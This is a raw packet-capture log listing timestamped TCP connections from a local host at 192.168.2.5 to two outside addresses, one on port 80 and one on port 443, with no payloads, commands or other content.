                                                                                                                                                                                        Nov 24, 2024 02:13:30.629307985 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.629360914 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.630239010 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.630338907 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.630354881 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.630398989 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.631124973 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.631189108 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.631205082 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.631242037 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.631278992 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.632172108 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.632242918 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.632257938 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.632312059 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.633086920 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.633141041 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.633157015 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.633200884 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.633217096 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.634026051 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.634078979 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.634094000 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.634135962 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.634977102 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.635046959 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.635062933 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.635107040 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.635967016 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.636023045 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.636038065 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.636070013 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.636914968 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.636969090 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.637006044 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.637022018 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.637065887 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.638149977 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.638223886 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.638242006 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.638271093 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.638890028 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.638961077 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.638974905 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.639007092 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.639039040 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.639801025 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.639852047 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.639868021 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.639900923 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.640741110 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.640815973 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.640831947 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.640872955 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.640913963 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.641681910 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.684510946 CET4434973713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.684710026 CET4434973713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.684892893 CET49737443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.684937954 CET49737443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.684947968 CET4434973713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.684978962 CET49737443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.684984922 CET4434973713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.688350916 CET49741443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.688383102 CET4434974113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.688486099 CET49741443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.688667059 CET49741443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.688683033 CET4434974113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.697185040 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.770318985 CET4434973613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.770476103 CET4434973613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.770689011 CET49736443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.770728111 CET49736443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.770746946 CET4434973613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.770757914 CET49736443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.770764112 CET4434973613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.774570942 CET49742443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.774602890 CET4434974213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.774677992 CET49742443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.774888992 CET49742443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.774904966 CET4434974213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.796395063 CET4434973813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.796454906 CET4434973813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.796658039 CET49738443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.796684980 CET49738443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.796690941 CET4434973813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.796701908 CET49738443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.796705961 CET4434973813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.799361944 CET49743443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.799376965 CET4434974313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.799449921 CET49743443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.799598932 CET49743443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.799611092 CET4434974313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.818813086 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.818887949 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.818903923 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.818948030 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.819262028 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.819319010 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.819334984 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.819350004 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.819399118 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.820235014 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.820281982 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.820297956 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.820377111 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.821203947 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.821271896 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.821275949 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.821288109 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.821327925 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.822146893 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.822199106 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.822215080 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.822251081 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.823122025 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.823175907 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.823190928 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.823230028 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.823266029 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.824064970 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.824095964 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.824110985 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.824147940 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.825053930 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.825108051 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.825124025 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.825158119 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.825190067 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.825994015 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.826030016 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.826045036 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.826078892 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.826936007 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.826997042 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.827013016 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.827044964 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.827085972 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.827912092 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.827969074 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.827984095 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.828028917 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.828890085 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.828946114 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.828960896 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.828998089 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.829032898 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.829824924 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.829875946 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.829893112 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.829932928 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.830790043 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.830826998 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.830842018 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.830899000 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.831727982 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.831789970 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.831804991 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.831844091 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.832684040 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.832734108 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.832748890 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.832787037 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.832823038 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.833635092 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.884696007 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:30.936265945 CET4434973913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.936337948 CET4434973913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.936448097 CET49739443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.938735962 CET49739443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.938743114 CET4434973913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.938767910 CET49739443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.938771963 CET4434973913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.943639994 CET49744443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.943655968 CET4434974413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:30.943732977 CET49744443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.943933964 CET49744443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:30.943947077 CET4434974413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:32.223866940 CET4434974013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:32.242528915 CET49740443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:32.242542982 CET4434974013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:32.243983984 CET49740443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:32.243989944 CET4434974013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:32.472378016 CET4434974113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:32.518898964 CET49741443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:32.518920898 CET4434974113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:32.523806095 CET49741443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:32.523814917 CET4434974113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:32.556580067 CET4434974213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:32.557416916 CET49742443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:32.557436943 CET4434974213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:32.558224916 CET49742443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:32.558229923 CET4434974213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:32.646327019 CET4434974313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:32.662184000 CET49743443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:32.662194967 CET4434974313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:32.662847996 CET49743443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:32.662853003 CET4434974313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:32.674324989 CET4434974013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:32.674484968 CET4434974013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:32.674540043 CET49740443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:32.679938078 CET49740443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:32.679960966 CET4434974013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:32.679970980 CET49740443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:32.679976940 CET4434974013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:32.752068043 CET49745443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:32.752109051 CET4434974513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:32.752163887 CET49745443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:32.753736973 CET49745443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:32.753751040 CET4434974513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:32.788784027 CET4434974413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:32.837790012 CET49744443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:32.850789070 CET49744443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:32.850804090 CET4434974413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:32.854629040 CET49744443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:32.854636908 CET4434974413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:32.917293072 CET4434974113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:32.917376041 CET4434974113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:32.917423964 CET49741443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:32.924642086 CET49741443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:32.924657106 CET4434974113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:32.924669027 CET49741443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:32.924674034 CET4434974113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:32.929714918 CET49746443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:32.929748058 CET4434974613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:32.929811001 CET49746443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:32.931348085 CET49746443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:32.931364059 CET4434974613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:33.000211000 CET4434974213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:33.000288010 CET4434974213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:33.000368118 CET49742443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:33.003215075 CET49742443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:33.003215075 CET49742443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:33.003232956 CET4434974213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:33.003245115 CET4434974213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:33.010960102 CET49747443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:33.010988951 CET4434974713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:33.011152983 CET49747443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:33.013628960 CET49747443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:33.013641119 CET4434974713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:33.099020004 CET4434974313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:33.099086046 CET4434974313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:33.099139929 CET49743443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:33.099446058 CET49743443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:33.099446058 CET49743443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:33.099456072 CET4434974313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:33.099463940 CET4434974313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:33.103003025 CET49748443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:33.103022099 CET4434974813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:33.103110075 CET49748443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:33.103418112 CET49748443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:33.103430033 CET4434974813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:33.262584925 CET4434974413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:33.262661934 CET4434974413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:33.262793064 CET49744443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:33.263396025 CET49744443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:33.263418913 CET4434974413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:33.263433933 CET49744443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:33.263441086 CET4434974413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:33.266758919 CET49749443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:33.266809940 CET4434974913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:33.266891003 CET49749443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:33.267117023 CET49749443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:33.267136097 CET4434974913.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:34.474894047 CET4434974513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:34.475569963 CET49745443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:34.475589037 CET4434974513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:34.476098061 CET49745443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:34.476104975 CET4434974513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:34.790030003 CET4434974613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:34.790657997 CET49746443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:34.790683985 CET4434974613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:34.791225910 CET49746443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:34.791232109 CET4434974613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:34.897600889 CET4434974713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:34.898066998 CET49747443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:34.898080111 CET4434974713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:34.898478031 CET49747443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:34.898482084 CET4434974713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:34.910753965 CET4434974513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:34.910913944 CET4434974513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:34.910990000 CET49745443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:34.911201954 CET49745443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:34.911216021 CET4434974513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:34.911235094 CET49745443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:34.911241055 CET4434974513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:34.914062023 CET49750443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:34.914094925 CET4434975013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:34.914177895 CET49750443192.168.2.513.107.246.63
